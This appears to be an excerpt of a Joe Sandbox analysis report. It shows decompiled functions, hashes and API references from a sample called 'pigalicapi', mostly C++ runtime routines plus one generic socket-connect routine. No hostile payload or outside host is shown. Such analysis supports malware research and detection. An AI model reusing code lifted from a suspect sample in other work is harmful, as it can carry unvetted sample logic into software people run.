Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
String ID:
API String ID: 2387900098-0
Opcode ID: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
Instruction ID: 069eecf464360b48a19cab1872b724955f5dbd0cfa50671f5b9cb90f7b6cbb53
Opcode Fuzzy Hash: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
Instruction Fuzzy Hash: 6181FBB0604305DFD710EF66D58469ABBF0BF44344F45882EE9858B352D7B8E9C2CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6FC Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 118
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040C6FC(void* __eax, signed char* __ebx, signed int __ecx, signed int __edx) {
				signed int _t81;
				signed int _t82;
				void* _t91;
				signed int _t94;
				signed char* _t99;
				signed int _t104;
				signed int _t116;
				int _t117;
				signed char* _t120;
				signed char* _t122;
				signed char* _t126;
				signed char* _t127;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int _t136;
				signed char* _t150;
				void* _t151;
				signed char* _t156;
				void* _t157;
				signed char** _t159;
				void* _t160;
				signed char** _t161;
				void* _t167;

				_t135 = __edx;
				_t120 = __ebx;
				if(__al == 0x24) {
					_t81 = __ebx[9] & 0x000000ff;
					_t3 = _t81 == 0x49;
					_t130 = __ecx & 0xffffff00 | _t3;
					if(_t3 == 0) {
						L3:
						_t151 = 0;
						if(_t120[0xa] == 0x5f) {
							_t151 = (_t130 << 0x1f >> 0x1f) + 3;
						}
					} else {
						_t151 = 0;
						if(_t81 == 0x44) {
							goto L3;
						}
					}
					L31:
				}
				 *_t159 = _t120;
				 *(_t157 - 0x184) = _t135;
				_t82 = strlen(??);
				 *(_t157 - 0x170) = _t120;
				 *(_t157 - 0x168) = 0x11;
				 *(_t157 - 0x164) = _t120;
				 *(_t157 - 0x15c) = 0;
				 *(_t157 - 0x150) = 0;
				_t131 = _t82;
				 *(_t157 - 0x16c) =  &(_t120[_t82]);
				 *((intOrPtr*)(_t157 - 0x158)) = _t131 + _t131;
				 *(_t157 - 0x14c) = _t131;
				 *(_t157 - 0x148) = 0;
				 *(_t157 - 0x144) = 0;
				 *(_t157 - 0x140) = 0;
				_t160 = _t159 - E0040DB20(0x00000012 + (_t131 + _t131 + _t131 * 0x00000004) * 0x00000004 & 0xfffffff0);
				_t91 = E0040DB20(0x00000012 + _t131 * 0x00000004 & 0xfffffff0);
				_t136 =  *(_t157 - 0x184);
				_t161 = _t160 - _t91;
				_t167 = _t151 - 1;
				 *((intOrPtr*)(_t157 - 0x160)) = _t160 + 0xc;
				 *(_t157 - 0x154) =  &(_t161[3]);
				if(_t167 == 0) {
					_t132 = 0;
					if(_t136 == 0x5f) {
						_t136 = _t120[1] & 0x000000ff;
						 *(_t157 - 0x164) =  &(_t120[1]);
						if(_t136 == 0x5a) {
							 *(_t157 - 0x164) =  &(_t120[2]);
							_t124 = _t157 - 0x170;
							_t132 = E00406810(_t157 - 0x170, 1);
							if(( *(_t157 - 0x168) & 0x00000001) != 0) {
								while(1) {
									_t156 =  *(_t157 - 0x164);
									_t136 =  *_t156 & 0x000000ff;
									if(_t136 != 0x2e) {
										goto L15;
									}
									_t104 = _t156[1] & 0x000000ff;
									_t77 = _t104 - 0x61; // -7
									if(_t77 <= 0x19 || _t104 == 0x5f || _t104 - 0x30 <= 9) {
										_t132 = E00405190(_t124, _t132);
										continue;
									} else {
										_t136 =  *_t156 & 0x000000ff;
									}
									goto L15;
								}
							} else {
								_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
							}
						}
					}
				} else {
					if(_t167 < 0 || _t151 > 3) {
						_t132 = E00405ED0(_t157 - 0x170);
						_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
					} else {
						_t150 =  &(_t120[0xb]);
						 *(_t157 - 0x164) = _t150;
						if(_t120[0xb] != 0x5f || _t120[0xc] != 0x5a) {
							 *_t161 = _t150;
							_t125 = _t157 - 0x170;
							_t134 = E00404FF0(_t157 - 0x170, strlen(??), _t150);
						} else {
							 *(_t157 - 0x164) =  &(_t120[0xd]);
							_t125 = _t157 - 0x170;
							_t134 = E00406810(_t157 - 0x170, 0);
						}
						 *_t161 = 0;
						_t116 = E00404F90(_t125, _t134, (0 | _t151 != 0x00000002) + 0x42);
						_t126 =  *(_t157 - 0x164);
						 *_t161 = _t126;
						 *(_t157 - 0x184) = _t116;
						_t117 = strlen(??);
						_t132 =  *(_t157 - 0x184);
						_t127 =  &(_t126[_t117]);
						 *(_t157 - 0x164) = _t127;
						_t136 =  *_t127 & 0x000000ff;
					}
				}
				L15:
				_t94 = 0;
				if(_t136 == 0 && _t132 != 0) {
					_t122 = _t157 - 0x13c;
					 *(_t157 - 0x3c) = 0;
					 *((char*)(_t157 - 0x38)) = 0;
					 *(_t157 - 0x2c) = 0;
					 *((intOrPtr*)(_t157 - 0x34)) =  *((intOrPtr*)(_t157 - 0x17c));
					 *(_t157 - 0x28) = 0;
					 *(_t157 - 0x20) = 0;
					 *(_t157 - 0x1c) = 0;
					 *(_t157 - 0x30) =  *(_t157 - 0x180);
					 *(_t157 - 0x24) = 0;
					E004079F0(_t122, _t132, 0x11);
					_t99 =  *(_t157 - 0x3c);
					 *_t161 = _t122;
					 *((char*)(_t157 + _t99 - 0x13c)) = 0;
					_t161[2] =  *(_t157 - 0x30);
					_t161[1] = _t99;
					 *((intOrPtr*)(_t157 - 0x34))();
					_t94 = 0 |  *(_t157 - 0x24) == 0x00000000;
				}
				return _t94;
				goto L31;
			}

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
Z__, xrefs: 0040C7B2
_, xrefs: 0040C687
_, xrefs: 0040C5B3

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_
API String ID: 39653677-4277869324
Opcode ID: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
Instruction ID: 8d7f502781d967d802a4aa3f964cc6313e810cf132c2305c106e04feedb735a0
Opcode Fuzzy Hash: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
Instruction Fuzzy Hash: 13511875D04619CBDB20DF69C8843DEBBF0AF49304F0481AAD448BB381DB399A898F85

Uniqueness

Uniqueness Score: -1.00%

Function 00411F10 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F47
CloseHandle.KERNEL32 ref: 00411F74
_endthreadex.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F8B
longjmp.MSVCRT(?,?,?,?,?,?,?,?,004122C1), ref: 00411FA6
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,004122C1), ref: 00411FB7
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411FE4
CloseHandle.KERNEL32 ref: 00411FFE

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
Instruction ID: 4e6f2f2bca7cf614c94cf5b6cd3d36f82834035e84155aea1445addecb616fae
Opcode Fuzzy Hash: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
Instruction Fuzzy Hash: C4313EB0204301DFD711AF65D98879A7FE4AF04348F45886EEA458F362D778D886CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 024EA090 Relevance: 10.6, APIs: 7, Instructions: 85
networkCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E024EA090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
				signed char _v8;
				short _v12;
				signed char _v13;
				signed int _v20;
				intOrPtr _v32;
				short _v34;
				char _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t40;
				char* _t42;

				_push(6);
				_push(1);
				_push(2);
				L024EB210();
				_v20 = __eax;
				if(_v20 != 0xffffffff) {
					_v36 = 2;
					_push(_a8 & 0x0000ffff);
					L024EB20A();
					_v34 = 2;
					_push(_a4);
					L024EB204();
					_v12 = 2;
					if(_v12 == 0) {
						return 0xffffffffffffffff;
					}
					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
					_v8 = 0;
					_v13 = 0;
					_v40 = 0;
					while(_v40 < _a12) {
						_push(0x10);
						_t42 =  &_v36;
						_push(_t42);
						_push(_v20);
						L024EB1FE();
						if(_t42 != 0) {
							_v40 = _v40 + 1;
							continue;
						}
						_v13 = 1;
						break;
					}
					if((_v13 & 0x000000ff) != 0) {
						if(_a16 != 0) {
							_v44 = _a16;
							_push(4);
							_push( &_v44);
							_push(0x1005);
							_push(0xffff);
							_push(_v20);
							L024EB1F2();
							_push(4);
							_push( &_v44);
							_push(0x1006);
							_push(0xffff);
							_push(_v20);
							L024EB1F2();
						}
						return _v20;
					}
					_t40 = _v20;
					_push(_t40);
					L024EB1F8();
					return _t40 | 0xffffffff;
				}
				return _v20;
			}

0x024ea096
0x024ea098
0x024ea09a
0x024ea09c
0x024ea0a1
0x024ea0a8
0x024ea0b7
0x024ea0bf
0x024ea0c0
0x024ea0c5
0x024ea0cc
0x024ea0cd
0x024ea0d2
0x024ea0d9
0x00000000
0x024ea0ea
0x024ea0e5
0x024ea0f2
0x024ea0f9
0x024ea0fd
0x024ea10f
0x024ea117
0x024ea119
0x024ea11c
0x024ea120
0x024ea121
0x024ea128
0x024ea10c
0x00000000
0x024ea10c
0x024ea12a
0x00000000
0x024ea12a
0x024ea138
0x024ea14c
0x024ea151
0x024ea154
0x024ea159
0x024ea15a
0x024ea15f
0x024ea167
0x024ea168
0x024ea16d
0x024ea172
0x024ea173
0x024ea178
0x024ea180
0x024ea181
0x024ea181
0x00000000
0x024ea186
0x024ea13a
0x024ea13d
0x024ea13e
0x00000000
0x024ea143
0x00000000

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 024EA09C
htons.WS2_32(?), ref: 024EA0C0
gethostbyname.WS2_32(?), ref: 024EA0CD
connect.WS2_32(000000FF,?,00000010), ref: 024EA121
closesocket.WS2_32(000000FF), ref: 024EA13E

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: closesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 530611402-0
Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
Instruction ID: c4d5b2e8de506d42f557759eda520b5497d63c7b86a7e469591cf18028dcf8b4
Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
Instruction Fuzzy Hash: 87314F70A00229ABEF11DFA5C845BFEF776FF48315F10865AE5226B2C0D3B59980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00415CC0 Relevance: 10.6, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB
InterlockedExchangeAdd.KERNEL32 ref: 00415D2D
ReleaseSemaphore.KERNEL32 ref: 00415D50
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415D60
InterlockedExchangeAdd.KERNEL32 ref: 00415D82
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44), ref: 00415D8A

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$Leave$ExchangeInterlocked$EnterReleaseSemaphore
String ID:
API String ID: 3502810096-0
Opcode ID: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
Instruction ID: c4e03dc48a609bb18e9f28535bc8b230369afd8b821da037918bb7a69205c831
Opcode Fuzzy Hash: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
Instruction Fuzzy Hash: C1215175A04608CFDB00EFB8E88929EBBF0EB88351F00853AE955C3350E734A559CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00417690 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00417690(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a20, intOrPtr _a32, char* _a36, intOrPtr _a40) {
				intOrPtr _t26;
				char* _t33;
				void* _t47;
				intOrPtr _t49;
				intOrPtr _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				char** _t55;

				_t49 = _a40;
				_a20 = _a36;
				_t26 = _a32;
				if(_t26 == 0) {
					L6:
					_t49 = _t49 - 1;
					 *_t55 = _a20;
					if(_t49 != 0) {
						E00418140(_t47, _t52, _t53, _t54);
						_a32 = 0xffffffff;
						E004183F0(_t47, _t52, _t53, _t54);
					} else {
						_t33 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t47, _t52, _t53, _t54))) + 8))();
						_t51 = __imp___iob;
						_a8 = 0xb;
						_a4 = 1;
						 *_t55 = "  what():  ";
						_a32 = 2;
						_a20 = _t33;
						_t18 = _t51 + 0x40; // 0x76664640
						_a12 = _t18;
						fwrite(??, ??, ??, ??);
						_t49 = __imp___iob;
						_t20 = _t49 + 0x40; // 0x76664640
						_a4 = _t20;
						 *_t55 = _a20;
						fputs(??, ??);
						 *_t55 = 0xa;
						_a4 = __imp___iob + 0x40;
						fputc(??, ??);
						E004183F0(_t47, _t52, _t53, _t54);
					}
					L4:
					_a32 = 0xffffffff;
					abort();
					L5:
					E004183F0(_t47, _t52, _t53, _t54);
					_a32 = 0xffffffff;
					 *_t55 = _a20;
					E0040E810();
					goto L6;
				}
				if(_t26 == 1) {
					goto L5;
				}
				asm("ud2");
				_a8 = 0x2d;
				_a4 = 1;
				 *_t55 = "terminate called without an active exception\n";
				_a12 = __imp___iob + 0x40;
				_a32 = 0xffffffff;
				fwrite(??, ??, ??, ??);
				goto L4;
			}

APIs

fwrite.MSVCRT ref: 004176D6
abort.MSVCRT ref: 004176E3
fwrite.MSVCRT ref: 00417749
fputs.MSVCRT ref: 00417762
fputc.MSVCRT ref: 0041777A

Strings

-, xrefs: 004176B0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: fwrite$abortfputcfputs
String ID: -
API String ID: 631181824-2547889144
Opcode ID: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
Instruction ID: e34ec58ff9fcec24660ec2e7040b0e2af75343082bb94453d7ff8c69b4f5a42c
Opcode Fuzzy Hash: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
Instruction Fuzzy Hash: 4D21C9B55083428FD304EF6AC54564EBBE0FB88718F048E2EE4D497391D779D8858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7DC Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 109
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040C7DC(signed char* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				signed int _t76;
				void* _t85;
				signed int _t88;
				signed char* _t93;
				signed int _t98;
				signed int _t110;
				int _t111;
				signed char* _t116;
				signed char* _t120;
				signed char* _t121;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t129;
				signed char* _t143;
				void* _t144;
				signed char* _t146;
				void* _t147;
				intOrPtr* _t149;
				void* _t150;
				signed char** _t151;
				void* _t154;

				 *_t149 = __ebx;
				 *(_t147 - 0x184) = __edx;
				_t76 = strlen(??);
				 *((intOrPtr*)(_t147 - 0x170)) = __ebx;
				 *(_t147 - 0x168) = 0x11;
				 *(_t147 - 0x164) = __ebx;
				 *(_t147 - 0x15c) = 0;
				 *(_t147 - 0x150) = 0;
				_t124 = _t76;
				 *((intOrPtr*)(_t147 - 0x16c)) = __ebx + _t76;
				 *((intOrPtr*)(_t147 - 0x158)) = _t124 + _t124;
				 *(_t147 - 0x14c) = _t124;
				 *(_t147 - 0x148) = 0;
				 *(_t147 - 0x144) = 0;
				 *(_t147 - 0x140) = 0;
				_t150 = _t149 - E0040DB20(0x00000012 + (_t124 + _t124 + _t124 * 0x00000004) * 0x00000004 & 0xfffffff0);
				_t85 = E0040DB20(0x00000012 + _t124 * 0x00000004 & 0xfffffff0);
				_t129 =  *(_t147 - 0x184);
				_t151 = _t150 - _t85;
				_t154 = _t144 - 1;
				 *((intOrPtr*)(_t147 - 0x160)) = _t150 + 0xc;
				 *(_t147 - 0x154) =  &(_t151[3]);
				if(_t154 == 0) {
					_t125 = 0;
					if(_t129 == 0x5f) {
						_t129 =  *(__ebx + 1) & 0x000000ff;
						 *(_t147 - 0x164) = __ebx + 1;
						if(_t129 == 0x5a) {
							 *(_t147 - 0x164) = __ebx + 2;
							_t118 = _t147 - 0x170;
							_t125 = E00406810(_t147 - 0x170, 1);
							if(( *(_t147 - 0x168) & 0x00000001) != 0) {
								while(1) {
									_t146 =  *(_t147 - 0x164);
									_t129 =  *_t146 & 0x000000ff;
									if(_t129 != 0x2e) {
										goto L9;
									}
									_t98 = _t146[1] & 0x000000ff;
									_t73 = _t98 - 0x61; // -7
									if(_t73 <= 0x19 || _t98 == 0x5f || _t98 - 0x30 <= 9) {
										_t125 = E00405190(_t118, _t125);
										continue;
									} else {
										_t129 =  *_t146 & 0x000000ff;
										goto L9;
									}
									goto L25;
								}
							} else {
								_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
							}
						}
						L25:
					}
				} else {
					if(_t154 < 0 || _t144 > 3) {
						_t125 = E00405ED0(_t147 - 0x170);
						_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
					} else {
						_t143 = __ebx + 0xb;
						 *(_t147 - 0x164) = _t143;
						if( *(__ebx + 0xb) != 0x5f ||  *((char*)(__ebx + 0xc)) != 0x5a) {
							 *_t151 = _t143;
							_t119 = _t147 - 0x170;
							_t127 = E00404FF0(_t147 - 0x170, strlen(??), _t143);
						} else {
							 *(_t147 - 0x164) = __ebx + 0xd;
							_t119 = _t147 - 0x170;
							_t127 = E00406810(_t147 - 0x170, 0);
						}
						 *_t151 = 0;
						_t110 = E00404F90(_t119, _t127, (0 | _t144 != 0x00000002) + 0x42);
						_t120 =  *(_t147 - 0x164);
						 *_t151 = _t120;
						 *(_t147 - 0x184) = _t110;
						_t111 = strlen(??);
						_t125 =  *(_t147 - 0x184);
						_t121 =  &(_t120[_t111]);
						 *(_t147 - 0x164) = _t121;
						_t129 =  *_t121 & 0x000000ff;
					}
				}
				L9:
				_t88 = 0;
				if(_t129 == 0 && _t125 != 0) {
					_t116 = _t147 - 0x13c;
					 *(_t147 - 0x3c) = 0;
					 *((char*)(_t147 - 0x38)) = 0;
					 *(_t147 - 0x2c) = 0;
					 *((intOrPtr*)(_t147 - 0x34)) =  *((intOrPtr*)(_t147 - 0x17c));
					 *(_t147 - 0x28) = 0;
					 *(_t147 - 0x20) = 0;
					 *(_t147 - 0x1c) = 0;
					 *(_t147 - 0x30) =  *(_t147 - 0x180);
					 *(_t147 - 0x24) = 0;
					E004079F0(_t116, _t125, 0x11);
					_t93 =  *(_t147 - 0x3c);
					 *_t151 = _t116;
					 *((char*)(_t147 + _t93 - 0x13c)) = 0;
					_t151[2] =  *(_t147 - 0x30);
					_t151[1] = _t93;
					 *((intOrPtr*)(_t147 - 0x34))();
					_t88 = 0 |  *(_t147 - 0x24) == 0x00000000;
				}
				return _t88;
				goto L25;
			}

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
Z__, xrefs: 0040C7B2
_, xrefs: 0040C687

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_
API String ID: 39653677-182788727
Opcode ID: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
Instruction ID: dc1124b8df5cbeb599ce563203a7e1262d4f469b331ea61f697e63e652aea6c4
Opcode Fuzzy Hash: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
Instruction Fuzzy Hash: 0151F871D052198BDB20DF69C8943DEBBF0AF85304F0481AED848BB391DB795A888F85

Uniqueness

Uniqueness Score: -1.00%

Function 00411C90 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411C99

Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E

Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414740
Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414779

SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040E202), ref: 00411CDD
realloc.MSVCRT ref: 00411D07
realloc.MSVCRT ref: 00411D1D
memset.NTDLL ref: 00411D4B
memset.NTDLL ref: 00411D69

Part of subcall function 00414660: Sleep.KERNEL32 ref: 00414698

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Sleep$ErrorLastmemsetrealloc$Value
String ID:
API String ID: 2283913283-0
Opcode ID: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
Instruction ID: ae9a74b205b84ac027549f7f7f86efa9fe3e638cf07f69e35c76b9f64c0e4442
Opcode Fuzzy Hash: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
Instruction Fuzzy Hash: EE31F4B4A042098FCB00EF69D484A9DBBF4FF88354F11456EE948DB311D738E981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC00 Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040CC00(intOrPtr* _a4) {
				char _v12;
				intOrPtr _v24;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr* _t18;
				intOrPtr _t19;
				intOrPtr* _t22;

				_t18 = _a4;
				_t12 =  *((intOrPtr*)( *_t18));
				if(_t12 > 0xc0000091) {
					if(_t12 == 0xc0000094) {
						_t19 = 0;
						L12:
						_v24 = 0;
						 *_t22 = 8;
						L0040EEF0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t22 = 8;
							L0040EEF0();
							if(_t19 != 0) {
								E0040D3A0(_t12);
							}
							L15:
							_t13 = 0xffffffff;
							L16:
							return _t13;
						}
						if(_t12 == 0) {
							L9:
							_t13 =  *0x422064; // 0x0
							if(_t13 == 0) {
								goto L16;
							}
							_a4 = _t18;
							_t22 =  &_v12;
